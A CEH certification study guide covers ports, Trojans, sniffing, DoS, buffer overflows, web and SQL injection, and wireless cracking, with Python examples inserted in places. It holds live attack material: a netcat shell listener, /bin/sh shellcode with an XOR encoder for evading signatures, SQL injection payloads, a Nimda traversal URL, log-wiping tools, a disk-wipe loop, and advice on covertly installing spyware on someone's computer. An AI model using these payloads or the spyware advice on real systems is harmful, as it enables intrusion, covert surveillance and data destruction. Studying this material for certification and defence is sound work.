141. To protect your VoIP network that uses the VxWorks operating system on the phones, block UDP port 17185 at the firewall to prevent the OS's default debug agent (WDB) from communicating outside the network (note: the exam may incorrectly have this as TCP port 17185; just remember it is port 17185).

142. Kerberos uses port 88 (TCP/UDP)

143. Security tokens are a good choice for two-factor authentication. They are a hardware device used along with a PIN (something you have plus something you know) and are often less expensive than smart cards.

144. You can install screen capturing Spyware on someone’s computer to track

someone’s activities online and send you an e-mail once a day to see what that person

has been up to when they surf the web.

145. PDF passwords can often be cracked: the owner (permissions) password can simply be stripped, and the user (open) password on older 40-bit RC4 PDFs falls to brute force; a strong password with AES-256 encryption is a different matter.

146. If you notice your log file decreasing in size, you should log this as suspicious activity, continue to investigate, and take further steps according to your security policy.

147. You can use the Elsave utility to clear event logs. Winzapper will selectively erase individual event log entries.

148. OutGuess is a steganography tool for JPG images; wbStego works with bitmaps.

149. GINA is the Graphical Identification and Authentication DLL (msgina.dll) that can be replaced to change the login screen on Windows NT through XP/2003; a replacement GINA can capture every password typed at logon. Windows Vista and later replaced GINA with credential providers.

150. Challenge/response authentication is used to prevent replay attacks.

151. Mandatory access control uses sensitivity labels on information and compares them to the clearance level a user is operating at.

152. Disable LM authentication on Windows XP in the registry under HKLM\SYSTEM\CurrentControlSet\Control\Lsa: set LmCompatibilityLevel to 3 or higher (send NTLMv2 only) and set NoLMHash to 1 so that LM hashes are no longer stored; existing LM hashes only disappear when each password is next changed.

153. John the Ripper can be used to crack a variety of passwords, but for LM hashes the output does not show whether the password is upper or lower case, because LM hashes are computed on the uppercased password; the case is recovered by testing the variants against the case-sensitive NTLM hash.

154. You should not respond to invalid usernames and passwords with separate "Invalid Username" and "Invalid Password" messages (this reveals which usernames exist); use a single "invalid username or password" message.

155. You can extract a Trojan hidden in an alternate data stream of an ordinary file with this syntax (cat here is the Unix tool from a port such as Cygwin; the built-in equivalent is more < textfile.txt:Trojan.exe > Trojan.exe):

C:\>cat textfile.txt:Trojan.exe > Trojan.exe

156. The following commands, when executed between two hosts, generate a huge amount of useless network data that you can use for performance testing (nc -l -p is the old-style netcat listener syntax):

Machine 1

# yes XXXXXXXXXXXXXXXXXXXXXXXXXXXX | nc -v -v -l -p 55555 > /dev/null

Machine 2

# yes ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ | nc machine1 55555 > /dev/null


Trojans and Backdoors

157. Use cryptcat instead of netcat if you want to encrypt your traffic.

158. A Trojan is a program masked inside another program (such as a game). You can

often see the Trojan running in the background by looking in the Windows Task

Manager. The process of hiding a Trojan or keylogger in another file is called wrapping.

159. You should compare a file's hash with the one published on the distribution media (or vendor site) to make sure that the file has not been replaced with a Trojaned copy. The exam's era used MD5; since MD5 collisions are practical, prefer SHA-256 or, better, a vendor signature.

160. To see what application executables are listening on ports, run the fport utility.

161. Example of a Snort log entry showing Back Orifice traffic (its default port is UDP 31337):

04/20-13:04:45.01351 172.16.0.5:31337 -> 192.168.1.1:1025

162. To start a Netcat listener that serves a shell (-d detaches it from the console on Windows): nc -l -p <port number> -e cmd.exe -d

163. To connect to a Netcat listener: nc <ip address> <port number>

164. Qaz is a Trojan that renames notepad.exe to note.com and installs itself in its place as notepad.exe.

165. DNS uses port 53 and is often used by backdoor programs because it is most likely open on the firewall.

166. Hackers will often make their Trojans persistent by adding a registry entry under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices (honored by Windows 9x; on NT-based Windows the Run and RunOnce keys under the same path are the usual autostart locations).

167. Tripwire is an example of a file integrity verification tool that can be used to detect unauthorized changes or modification of binary files on a system.

168. You can use the netstat command (netstat -an on Windows) to see what connections and listening ports your computer currently has.

169. Use the fport utility to look for applications that listen on certain ports.

170. Port 6667 is used by the Net-Devil Trojan. In hex, this is 0x1A0B.

Sniffers

171. You can get around switches by using ARP spoofing, MAC duplicating, and MAC flooding.

ARP spoofing the default gateway is a common method to capture traffic on a switched network.

Without other techniques like MAC flooding or ARP spoofing, you will not be able to capture traffic on a switched network, because the switch only forwards a frame to the port where its destination MAC address was learned.

Use ./macof to flood the switch's port-to-MAC address table (CAM table) with bogus source addresses. Once the table is full, many switches fail open and flood frames for unknown destinations out of every port, which lets you sniff them as if on a hub.

172. Ettercap and Ethereal (now Wireshark) are popular sniffers. Sniffers work best on networks using hubs.

To detach Ettercap from the console and log all sniffed passwords to a file, use the command: ettercap -NCLzs --quiet

Ethereal allows for filters. For example, a display filter that only shows the SYN and SYN/ACK segments of connections involving host 172.16.0.4 is: ip.addr==172.16.0.4 and tcp.flags.syn==1 (tcp.flags.syn on its own only tests that the field is present, which is true of every TCP segment; the final ACK of the handshake is not matched by this filter).


173. WinPCap is the name of the Windows Packet Capture library which must be installed in order to use a sniffer on Windows platforms. Many sniffers install this automatically for you. LibPCap is the equivalent for Linux.

174. The best options for preventing attackers from sniffing your passwords are to use Kerberos, smart cards, and/or Stanford Secure Remote Password (SRP).

175. You can defend against ARP spoofing by:

Placing static ARP entries on servers, workstations, and routers

Using the ARPWALL system

Tuning IDS sensors to look for large amounts of ARP traffic on local subnets

(On managed switches, Dynamic ARP Inspection together with DHCP snooping blocks spoofed ARP replies at the port.)

176. Wireshark (Ethereal) allows for filters. For example, to show only HTTP packets for Hotmail's login host that mention POP3, the guide gives (http = "login.passport.com") && (http contains "POP3"); the first clause is not valid filter syntax, and the working form is http.host == "login.passport.com" && http contains "POP3".

177. TCPflow can be used to extract the application-layer data of each TCP connection from a capture file into separate files.

Denial of Service

178. A smurf attack is when you send an ICMP echo request to a network's broadcast address with a spoofed source address of your target, so every host on that network replies to the target. A fraggle attack is similar but uses UDP (typically the echo and chargen services).

179. A SYN flood is a DoS attack in which a large number of SYN packets appear on a network without the corresponding reply packets, filling the target's half-open connection queue.

180. A LAND attack is when an attacker forges a TCP SYN packet whose source address and port are the same as the destination address and port, causing the victim to try to open a connection with itself. On vulnerable stacks this sends the system into a loop which, in turn, can hang or slow down the system.

181. The following are techniques used to block against SYN flood attacks:

Micro blocks: instead of allocating a complete connection object, simply allocate a micro-record.

SYN cookies: instead of allocating a record, send a SYN-ACK with a carefully constructed sequence number generated as a hash of the client's IP address, port number, and other information. When the client responds with a normal ACK, that sequence number (plus one) comes back in the acknowledgement field, which the server then verifies before creating the connection.

RST cookies: an alternative to SYN cookies where the server sends a wrong SYN/ACK back to the client. The client should generate a RST packet telling the server that something is wrong, which informs the server that the client is valid.

Stack tweaking: TCP stacks can be tweaked to reduce the effects of SYN floods. For example, timeouts can be shortened and the backlog queue enlarged.
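The SYN-cookie exchange described above, as an added example rather than anything from the guide. The cookie layout (a 24-bit HMAC-SHA256 truncation over the 4-tuple and a coarse counter, plus 8 counter bits), the single static SECRET and the addresses are assumptions for illustration; Linux additionally packs an MSS index into the cookie and rotates its keys.

```python
# Added example, not from the study guide. The server never stores a
# half-open connection: the SYN-ACK's sequence number is a keyed hash it can
# recompute when the client's ACK comes back.
import hashlib
import hmac
import os

SECRET = os.urandom(16)          # assumption: one static server-side secret
COUNTER_BITS = 8                 # low bits of the cookie carry a coarse counter
COUNTER_MASK = (1 << COUNTER_BITS) - 1
MAX_AGE = 2                      # accept cookies up to two counter ticks old


def _mac(src_ip, src_port, dst_ip, dst_port, counter):
    """24-bit MAC over the 4-tuple and the counter, keyed with SECRET."""
    msg = f"{src_ip}:{src_port}>{dst_ip}:{dst_port}|{counter}".encode()
    tag = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(tag[:3], "big")


def make_cookie(src_ip, src_port, dst_ip, dst_port, counter):
    """Initial sequence number for the SYN-ACK. No state is stored."""
    c = counter & COUNTER_MASK
    return (_mac(src_ip, src_port, dst_ip, dst_port, c) << COUNTER_BITS) | c


def check_cookie(src_ip, src_port, dst_ip, dst_port, ack, now_counter):
    """Validate the handshake's final ACK: ack - 1 must be a cookie this
    server issued recently for this 4-tuple. True means: create the socket."""
    cookie = (ack - 1) & 0xFFFFFFFF
    counter = cookie & COUNTER_MASK
    if (now_counter - counter) & COUNTER_MASK > MAX_AGE:
        return False                      # stale, or never issued by us
    expected = make_cookie(src_ip, src_port, dst_ip, dst_port, counter)
    return hmac.compare_digest(cookie.to_bytes(4, "big"),
                               expected.to_bytes(4, "big"))


def simulate_flood(n_syns, now_counter=17):
    """Spoofed SYNs each get a SYN-ACK but never complete the handshake;
    because nothing is allocated per SYN, the backlog stays empty."""
    backlog = []
    for i in range(n_syns):
        src = f"10.{(i >> 16) & 255}.{(i >> 8) & 255}.{i & 255}"
        make_cookie(src, 40000 + (i % 20000), "192.0.2.10", 80, now_counter)
        # a spoofed source never answers, so there is nothing to add
    return len(backlog)


def honest_client(now_counter=17):
    """A real client echoes cookie + 1 in its ACK and is accepted."""
    c = make_cookie("198.51.100.7", 51515, "192.0.2.10", 80, now_counter)
    ack = (c + 1) & 0xFFFFFFFF
    return check_cookie("198.51.100.7", 51515, "192.0.2.10", 80, ack, now_counter)
```

A forged ACK has to guess 24 MAC bits for the right 4-tuple within the MAX_AGE window, and an ACK arriving after the window (or for a different source address) is rejected without the server ever having kept state for it.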

182. A Ping of Death attack sends fragmented ICMP packets that, when reassembled, are larger than the maximum IP datagram size of 65,535 bytes, overflowing the reassembly buffer on vulnerable systems.

183. IDS devices are primary victims to smurf attacks.


184. A denial of service attack prevents legitimate users from gaining access to a service. A distributed denial of service (DDoS) attack uses zombie hosts to launch the attack from many sources at once.

185. A Teardrop attack sends IP fragments with overlapping (bogus) offset values that crash vulnerable reassembly code.

186. Ping sweeping your network may cause your IDS to report a smurf attack. To prevent these alarms, do not scan the broadcast IP address when scanning your network.

187. Hackers usually control bots through IRC channels. The initial two commands that an IRC client sends to join an IRC network are USER and NICK. (Note: technically, the PASS command comes first according to RFC 1459, but it is optional. Therefore, USER/NICK are the initial two commands.)

188. Network Based Application Recognition (NBAR) is a Cisco IOS mechanism that examines packets at Layers 4 to 7. It can be used to counter DDoS attacks and worm-generated traffic by identifying malicious packets and dropping them.

189. Emsa Web Monitor can be used to check on the status (uptime statistics) of your web server.

190. Make sure your router won't forward a directed broadcast (no ip directed-broadcast on Cisco interfaces, the default since IOS 12.0) so that your network cannot be used as a smurf amplifier.

191. Reflective DDoS attacks usually spoof the originating IP addresses and send the requests at reflectors, which then answer to the victim. To detect reflectors on your network you should scan the network using Nmap for the services used by these reflectors.

192. Trinoo, TFN2K, WinTrinoo and Stacheldraht are all DDoS tools (T-Sight, which the exam lists alongside them, is a session-hijacking tool).

193. The following command (Windows ping: a 56,550-byte payload sent continuously) may freeze an older router:

ping -l 56550 10.0.0.1 -t

Session Hijacking

194. To perform a session hijack, you must find the sessions, predict the sequence number, and take over the session.

195. Strong authentication is not enough to call your network secure because someone could always perform session hijacking to take over sessions that are already authenticated. This is the key advantage to session hijacking: taking over an already authenticated connection.

196. Hunt is a common session hijacking tool. It can intercept traffic then perform a man-in-the-middle attack (MiTM).

197. In a Man-in-the-middle (MiTM) attack, an attacker will intercept a transmission to copy and forward all packets between two hosts, reading or altering them in transit.

198. Using unpredictable sequence numbers will help secure against session hijacking.

199. TCP/IP session hijacking is carried out on the transport layer.

200. Challenge/response authentication is used to prevent session hijacking attacks that replay captured credentials; it does not protect a session that is already established, which needs encryption and integrity protection (SSL/TLS, SSH, IPsec) on the session itself.

201. Use unpredictable sequence numbers to secure sessions against hijacking.


202. RFC 2827 (BCP 38, ingress filtering: drop packets whose source address does not belong to the network they arrive from) helps defeat IP address spoofing.

Buffer Overflows

203. Canary words are a method used by compilers (StackGuard, later GCC's -fstack-protector) to raise an alarm if a buffer overflow has been attempted: a canary value is placed between the local buffers and the saved return address and is checked before the function returns.

A terminator canary is built from NULL (0x00), CR (0x0d), LF (0x0a), and EOF (0xff), the bytes that stop string-copy functions, so an attacker cannot write past it with such a function without also altering it. If the canary has been altered when a function returns, an alarm is raised and the program aborts.

204. A NOP sled is a series of No Operation instructions placed in front of the shellcode so that the overwritten return address only has to land somewhere in the sled rather than exactly at the payload; execution slides down the sled into the shellcode. The hexadecimal value for the x86 NOP is 0x90.

205. The following code (an x86 Linux setreuid(0,0) + execve("/bin/sh") stub) is usually an indication of a buffer overflow attack:

char shellcode[] =
    "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b"
    "\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b"
    "\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff"
    "\x2f\x62\x69\x6e\x2f\x73\x68";

206. Buffer overflows are exploited through unbounded or misused function calls such as gets(), scanf("%s"), strcpy(), strcat() and sprintf(). The exam also lists fgets() and strncpy(); both take a length, but an overflow still occurs if the length passed is larger than the destination, and strncpy() leaves the buffer unterminated when the source fills it.

207. Buffer overflows are due to programming errors and bad quality assurance practices.

208. Polymorphic shellcode works by XORing values over the shellcode, prepending loader code that decrypts the shellcode at run time, and then executing the decrypted shellcode, so the bytes on the wire differ from the known signature.

209. Two types of buffer overflows are heap based and stack based.

210. When writing shellcode that is delivered through a C string-copy function, be sure to remove any null bytes (0x00), as a null terminates the string and the rest of the payload would never be copied.
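An added example (not from the guide) tying items 208 and 210 together: XOR-encode the shellcode quoted in item 205 with a single-byte key chosen so that the output contains no 0x00, check that a byte-pattern signature no longer matches, and decode it back. The decode loop is written in Python here; a real polymorphic payload prepends an x86 decoder stub. SIGNATURE and the key values are illustrative assumptions.

```python
# Added example, not from the study guide. Only the XOR wrapper is new; the
# payload bytes are the setreuid/execve("/bin/sh") stub quoted in item 205.
import random

SHELLCODE = bytes.fromhex(
    "31c0b04631db31c9cd80eb165b31c0884307895b0889430cb00b"
    "8d4b088d530ccd80e8e5ffffff2f62696e2f7368")

SIGNATURE = b"/bin/sh"   # assumption: what a naive IDS byte-pattern rule matches


def usable_keys(payload: bytes):
    """Keys that are non-zero and never equal a payload byte: b ^ k == 0
    exactly when b == k, so excluding those keys guarantees no null bytes."""
    return [k for k in range(1, 256) if k not in payload]


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def encode(payload: bytes, key=None):
    """Return (key, encoded). A fresh random key each call gives a different
    byte pattern every time (polymorphism) with no 0x00 in the output."""
    keys = usable_keys(payload)
    if not keys:
        raise ValueError("every byte value occurs; use a multi-byte key")
    if key is None:
        key = random.choice(keys)
    elif key not in keys:
        raise ValueError("key would produce a null byte")
    return key, xor_bytes(payload, key)


def decode(encoded: bytes, key: int) -> bytes:
    """What the loader stub does at run time: XOR is its own inverse."""
    return xor_bytes(encoded, key)


def matches_signature(data: bytes, sig: bytes = SIGNATURE) -> bool:
    return sig in data
```

Key 0x07 is refused because the stub contains a 0x07 byte (the mov [ebx+7], al offset) and would encode to a null; any other key gives a payload with the same behaviour after decoding and a different byte pattern on the wire.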

211. Buffer overflows overwrite the saved return address on the stack (which lies past the local buffer) with the address of the exploit code; when the function returns, that address is loaded into EIP and execution jumps to the payload. (The exam phrases this as overwriting ESP; ESP is the stack pointer, and it is the saved return address it points to that gets overwritten.)

212. The following pseudo code demonstrates the logic of stopping a stack buffer from receiving more than 200 characters (a bounds check before every write):

IF (I > 200) then exit (1)

213. Many IDS devices will have signatures for common buffer overflow attacks. Attackers can get around this by using polymorphic shellcode with a tool such as ADMutate to change the signature of their exploits.

214. Using printf(str) instead of printf("%s", str) may leave your program exposed to format string attacks, because the attacker-controlled string is interpreted as the format.

215. Buffer overflows often try to exploit an application and launch a command shell. Below is an example of output from a network IDS of an attack that is trying to get a Linux command shell (/bin/sh):


Hacking Web Servers

216. Setting your web pages to be read-only may prevent others from being able to deface them.

217. IIS 5 runs in the context of the LocalSystem account. If a hacker successfully performs a buffer overflow attack against a default IIS installation on a Windows 2000 server, the hacker may be able to spawn a shell. The default privileges within the shell will be LocalSystem.

218. Hex-encoded characters are commonly used to obfuscate URLs.

219. Cookies can be session or persistent cookies.

220. IPP, Code Red, and the ISAPI Indexing Service are all associated with IIS buffer overflow exploits (the .printer ISAPI extension and the idq.dll indexing filter).

221. Some web sites use cookies to keep a user session active once a user has logged in. When a user logs in to the application, a cookie can be sent to the client that may contain the user ID which is checked for access rights. A hacker can compromise a system that uses cookies by intercepting the communication between the client and the server and changing the cookie to make the server believe that there is a user with higher privileges.

222. If you can access someone's cookie, you can use parameter manipulation to alter the cookie to gain additional access. For example, if the cookie says ADMIN=no, you can change the parameter to say ADMIN=yes. The fix is to keep authorization state on the server (or sign the cookie) rather than trusting client-supplied values.

223. A DNS poisoning attack is when a hacker changes a DNS entry for a web site to point to their web server instead of the legitimate site.

224. Many systems come with default user accounts with well-known passwords that administrators forget to change.


225. Often the default location of installation files can be exploited, which allows a hacker to retrieve a file from the system.

226. Many software packages come with “samples” that can be exploited.

227. Attackers may be able to store a copy of your web page locally, change a 'hidden' price value in the form source, and submit an order to purchase products at a lower price. Prices and other hidden fields must be looked up server-side, never taken from the submitted form.

228. Canonicalization is the process of converting something from one of its many possible representations into its simplest, standard form. It deals with the way in which systems convert data from one form to another; security checks must be applied to the canonical form, or encoded variants will slip past them.

229. You can use the robots.txt file in the root of your website to define directories that you do not want crawled by WWW spiders. It is publicly readable, so it also tells an attacker where the interesting directories are; do not list anything there that relies on being unknown.

230. One approach to secure against phishing scams is to use RSA SecurID based authentication systems along with one-time password lists, so that a phished password alone is not enough to log in.

231. Form scalpel can be used to dissect HTML forms.

Web Application Vulnerabilities

232. Use wget to download multiple web pages.

233. Web applications often have non-validated parameters, broken access control, broken session management, cross-site scripting, and buffer overflow vulnerabilities.

234. Web applications can have several vulnerabilities, including visible clear-text passwords, the anonymous user account left at its default, missing latest security patches, no firewall filters, and no SSL configured.

235. Cross-site scripting (XSS) attacks allow an attacker's script to run in your browser, in the context of the vulnerable site and with whatever that site can do on your behalf, without installing any software. Web forums are often vulnerable to these kinds of attacks because they echo user-supplied content back to other users.

A clue that cross-site scripting is being done is the <script> tag.

An example of a cross-site scripting attack is when you click on a link in an e-mail message and are taken to a web-based bulletin board where script embedded in the page runs in your browser under your session without your knowing.

Cross-site scripting attacks often try to grab a person's cookie. To view your cookie via JavaScript for a particular site, the code would be <script>alert(document.cookie)</script>.

The exam's answer for the best protection against XSS is to disable JavaScript in the IE and Firefox browsers. That only protects one client; the real fix is on the server: validate input and HTML-encode all user-supplied data before it is written into a page.

236. Lynx is a scaled down, text-based, basic web browser that you can use when testing sites which you suspect may have malicious code on it.

237. Use HTTPS (HTTP over SSL) to send data instead of plain HTTP. In the exam's era that meant SSLv3; today it means TLS 1.2 or later, since SSLv3 itself is broken.


238. Java code runs in a sandbox with bounds-checked arrays and is therefore not itself vulnerable to buffer overflow attacks (the JVM's native code and native libraries can still be).

239. The GET method should never be used when sensitive data such as credit card information is being sent to a CGI program. This is because any GET parameter appears in the URL and therefore in browser history and in proxy and server logs. Replace the GET method with the POST method when sending sensitive data (and use HTTPS, since POST alone does not encrypt anything).

240. Session management web application testing is focused on checking the time validity of session tokens, the length (unpredictability) of tokens, and the expiration of session tokens.

241. Website cloaking is a technique that performs a reverse IP address lookup to get the domain name of a person browsing your site. Once this is determined, you can direct them to a specific version of a page for particular domains.

242. To protect against attacks that run on top of SSL (which a firewall or IDS cannot see inside), install a proxy server and terminate SSL at the proxy, or install a hardware SSL "accelerator" and terminate SSL at this layer, so that the traffic can be inspected in the clear behind it.

243. An example of a Web Bug is a small image file that is one pixel in height and width, fetched from a third-party server so that the request reports the user's visit (and cookie) when users browse a site.

244. SSL operates at the transport layer and S-HTTP operates at the application layer.

Web Based Password Cracking

245. HTTP authentication can be Basic, Digest, or Integrated (NTLM/Kerberos). Basic sends the password base64-encoded, which is as good as clear text, so it is easily sniffed. Digest is more secure than Basic because the password is hashed together with a server nonce rather than sent.

246. Single sign-on is when users only have to remember one username and password to be authenticated to multiple services.

247. The Remote Password Assassin (RPA) is a password cracking tool that can run dictionary attacks against FTP and Web servers. To defend against these types of attacks you should:

Never use a password related to a hostname, domain name, or anything else that can be found with whois

Never use a password related to your hobbies, pets, relatives, or date of birth

Never leave a default password

Never use a password that can be found in a dictionary

Linux Hacking

248. ps is the command to list processes running on a system.

249. Rootkits can be used to hide processes, files, network connections, or (on Windows) registry entries.

250. The three most common commands that hackers attempt to Trojan on a Linux box are netstat, ps, and top (ls, login and ifconfig are also frequent targets).

251. Loadable Kernel Modules (LKMs) are loaded into the running kernel on demand; they do not require you to recompile or reboot the kernel, which makes them a favourite vehicle for kernel-level rootkits.

252. Cygwin is a free UNIX subsystem that runs on top of Windows.


253. Rootkits are often used to replace legitimate programs. For example, you could use one to replace ifconfig in Linux to prevent others from seeing that your network card is operating in promiscuous mode.

254. Hackers will often try to cover their tracks. On Linux machines, a hacker can remove the rootkit source and installer they used (and the shell history) with the 'rm' command once the rootkit is in place.

255. The execve() system call is used with setuid binaries to escalate privileges: a setuid-root program that can be made to execve() an attacker-chosen command runs it as root. The exam's answer is to disable the execve() system call; that is not possible on a working system, so in practice you minimise and patch setuid-root binaries (find / -perm -4000 lists them) and mount user-writable filesystems nosuid.

256. iptables, available in Linux kernel 2.4 and up, provides stateful packet inspection (SPI) through connection tracking. The following is an example of an iptables rule that allows TCP packets coming in on interface eth1 from any IP address destined for 172.16.1.1 (the guide prints -I eth1, but -I inserts a rule; the interface option is lower-case -i):

iptables -A INPUT -i eth1 -s 0/0 -d 172.16.1.1 -p tcp -j ACCEPT

257. Filesnarf copies files transferred via NFS over a network.

258. You can check for the presence of rootkits in Linux by running chkrootkit (sudo chkrootkit); rkhunter is a comparable tool.

259. You can wipe a Linux hard drive with the following shell loop (the guide prints /dev/had; the device is /dev/hda, and /dev/urandom is used here because /dev/random blocks whenever the entropy pool is empty):

for (( i = 0; i < 11; i++ )); do
    dd if=/dev/urandom of=/dev/hda && dd if=/dev/zero of=/dev/hda
done

260. Linux password hashes are stored in the /etc/shadow file.

261. You can run the wipe -fik /dev/hda1 command in Knoppix to permanently erase data on a hard drive partition.

Cryptography

262. Hashing algorithms are used to guarantee the integrity of messages. SHA-1 creates a 160-bit hash; MD5 creates a 128 bit hash. Note: on the exam you may see this referred to as the “number of bits of encryption” and not the word hash.

263. Integrity can be defined as sound, unimpaired or perfect condition.

264. RC4 is the stream cipher you are expected to know (the exam treats it as the only one; others such as A5/1 and Salsa20 exist). Stream ciphers are a type of symmetric key encryption algorithm that transforms a stream of plaintext characters into a stream of ciphertext characters of the same length by XORing the plaintext with a keystream.

265. The tradeoff of encryption is speed. IPsec VPNs can slow down your network.

266. Cryptography attacks include chosen-ciphertext, known-ciphertext, and replay attacks.

267. PKI is a way to distribute public keys in certificates; the public keys are then used with asymmetric encryption to exchange the symmetric session keys that do the bulk encryption.

268. With XOR operations, if both values are the same, the result is zero. If the values are different, then the result is one.

Value1 Value2 Result
0 0 0
1 0 1
0 1 1
1 1 0

269. A digital signature is the hash of a message that is encrypted with a private key.

270. Microsoft Authenticode technology is used to digitally sign ActiveX controls.

271. DES, AES, and Blowfish are all examples of block ciphers. RC4 is a stream cipher.

272. The most common way of attacking RSA encryption is to recover the two prime numbers used in RSA key generation by factoring the public modulus.

273. PGP is a good solution when you need a low-cost solution to encrypt e-mail.

Government Access to Keys (GAK) is a key-escrow scheme under which a government investigator can demand your encryption keys and algorithms.

274. Message repudiation means a sender can claim they did not actually send a particular message; digital signatures provide the non-repudiation that prevents this.

275. SSH is a common tunneling tool. SSH uses port 22 and must be allowed through your firewall in order for you to establish an SSH session.

SSH can be used to tunnel plain-text traffic such as POP3 through an encrypted channel. It is a good alternative when you do not have VPN capabilities.

If port 22 is blocked by a firewall that rejects with a reset, PuTTY (a common SSH client) will report "Network error: Connection reset by peer" (the exam's answer); a firewall that silently drops the packets produces a connection timeout instead.

SQL Injection

276. You can test for SQL injection by entering a single quote (a database error shows the quote reached the query parser) or by typing anything' or 1=1-- in a username field on a web site (the -- comments out the rest of the query, including the password check).

277. The next step after determining that a web site is vulnerable is to identify the database and table names, here with a blind injection against Microsoft SQL Server that tests one character of the first user table's name at a time (the guide's substring() has two arguments; T-SQL SUBSTRING needs three):

http://www.mysite.com/test/include.asp?numberID=4 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1,1))) > 109

278. An example of SQL injection (URL-encoded; it decodes to me';update usertable set pass='letmein';-- and stacks an UPDATE after the original query):

http://www.testsite.com/data.asp?name=me%27%3bupdate%20usertable%20set%20pass%3d%27letmein%27%3b--%00

279. SQL injection can be used where there are poorly designed input validation routines, that is, wherever user input is concatenated into a query instead of being passed as a parameter.

280. The following is an example of (ASP/VBScript) code that is susceptible to a SQL injection attack because it splices the request parameters straight into the query with no input validation:

sSQL = "SELECT * FROM Users where Username='" & Request("user") & "' and Password='" & Request("pwd") & "'"
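An added example, not the guide's own code: the string-built query of item 280 recreated in Python against an in-memory SQLite table, next to the parameterized form, exercised with the item 276 probes. The table, its rows and the function names are constructed for the demonstration.

```python
# Added example, not from the study guide. Constructed Users table; the
# vulnerable function has the same shape as the guide's sSQL string.
import sqlite3


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    db.executemany("INSERT INTO Users VALUES (?, ?)",
                   [("alice", "S3cret!"), ("bob", "hunter2")])
    return db


def login_vulnerable(db, user: str, pwd: str):
    """User input is spliced into the SQL text, so quotes become syntax."""
    sql = ("SELECT Username FROM Users WHERE Username='" + user +
           "' AND Password='" + pwd + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, user: str, pwd: str):
    """Placeholders: the driver passes values separately from the SQL text,
    so a quote in the input is data, never syntax."""
    sql = "SELECT Username FROM Users WHERE Username=? AND Password=?"
    row = db.execute(sql, (user, pwd)).fetchone()
    return row[0] if row else None


def quote_probe_errors(db, login) -> bool:
    """Item 276's first test: a lone single quote. A database error means the
    quote reached the SQL parser, i.e. the login is injectable."""
    try:
        login(db, "'", "x")
    except sqlite3.Error:
        return True
    return False
```

With the item 276 payload the vulnerable query becomes WHERE Username='anything' or 1=1--' AND Password='...', the -- comments out the password check, and the first row comes back; the parameterized version looks for a user literally named anything' or 1=1-- and finds none.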

Page 25: CEH supplement v9.5

C|EH Study Guide

Hacker University Page 25

Hacking Wireless Networks

281. AirSnort implements the Fluhrer-Mantin-Shamir (FMS) attack. Only encrypted packets are counted (and only those with weak IVs are useful). You need to capture around five to ten million packets in order to crack WEP with AirSnort.

282. Wireless access points act like hubs on a network: every station hears every frame. Therefore, you will be able to capture more traffic in a shorter amount of time on a wireless network than on a switched wired network.

283. Aircrack uses KoreK's statistical attacks for WEP cracking, which need far fewer packets. AirSnort uses the FMS attack.

284. A wireless injection attack is when you capture an ARP request and re-inject it hundreds of times per second on a wireless network, so the AP generates a flood of new encrypted packets (fresh IVs) that speed up WEP cracking.

285. SSIDs are not considered a good security mechanism to protect a wireless network because the SSID is transmitted in clear text.

286. In warchalking, a )( symbol represents an open access point (unfiltered/unencrypted).

287. Wardriving is when a hacker drives around in a car looking for wireless networks.

288. If a wireless access point is using MAC filtering, sniff traffic on the WLAN and spoof your MAC address to one of the allowed addresses you have captured.

289. Even if a network disables SSID broadcast, you can still get the SSID by sniffing the wireless network. The SSID is still sent in clear text in the probe and association frames exchanged between clients and the AP.

290. Directional antennas are not enough to secure your network because wireless signals can still be detected from miles away.

291. If you are not capturing enough traffic to crack a WEP key, use a sniffer like Ettercap to discover the gateway, then send an ICMP ping flood to generate traffic.

292. A rogue access point is an unauthorized access point attached to the network; an evil twin is a rogue AP that mimics a legitimate AP's SSID and overrides its signal so that clients associate with it instead.

293. 802.11a operates in the 5.15 – 5.825 GHz frequency.

294. VPNs are often used in wireless networks, but they will double the overhead on an access point.

295. WEP encryption is vulnerable because there is no mutual authentication between wireless clients and access points, automated tools can discover WEP keys, and the 24-bit IV field is too small (IVs repeat quickly on a busy network).

296. The SSID identifies your wireless network and, in the exam's wording, "acts as a password for network access"; in reality it is sent in the clear and is not a secret (see 285).

297. GPSDrive can be used to map wireless access points.

Viruses

298. Messenger spam is when you receive a pop-up on your screen with SPAM sent through the Windows Messenger service (not the chat program). It usually uses UDP ports 1026 to 1029.


299. The following are common file attachments that are used by viruses and

malware:

.scr

.vbs

.com

.exe

.pif

.htm

300. MS Blaster exploits the RPC DCOM vulnerability on ports 135 and 445. Snort rules to detect MS Blaster will reference these ports (the guide's variable names and the missing direction operator are corrected here; $EXTERNAL_NET and $HOME_NET are Snort's standard variables):

alert tcp $EXTERNAL_NET any -> $HOME_NET 135

alert tcp $EXTERNAL_NET any -> $HOME_NET 445

301. The European Institute for Computer Antivirus Research (EICAR) has created the following 68-character string that can be used as a harmless test file to check that your antivirus software is working (the file must begin with it):

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

302. Signature based virus scanners are only as good as their signature database. If there is no signature, then a virus will not be detected.

303. To check for unauthorized changes to files, use file integrity verification tools. Tripwire is a popular file integrity verifier.

304. Antivirus programs compare the signature of executable files to a database of known viral signatures. Polymorphic viruses re-encrypt their body with a different key on every infection, so they cannot be detected by a simple static signature; scanners counter with emulation and heuristics.

305. Melissa is a macro virus.

306. The Slammer worm exploits a buffer overflow in the MS-SQL Server Resolution Service (UDP port 1434).

307. The best protection against viruses is prevention, not detection. That is, you should stop viruses from getting onto the system in the first place, not just scan for viruses. One way to stop viruses from getting onto your system is to disable the use of external media such as USB thumb drives and floppy disks.

308. A worm is self-replicating, while a virus attaches itself to another host program.

309. Nimda exploits the IIS directory traversal bugs, both the Unicode (%c0%af) and the double-decode (%255c) variants. E.g.:

GET /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

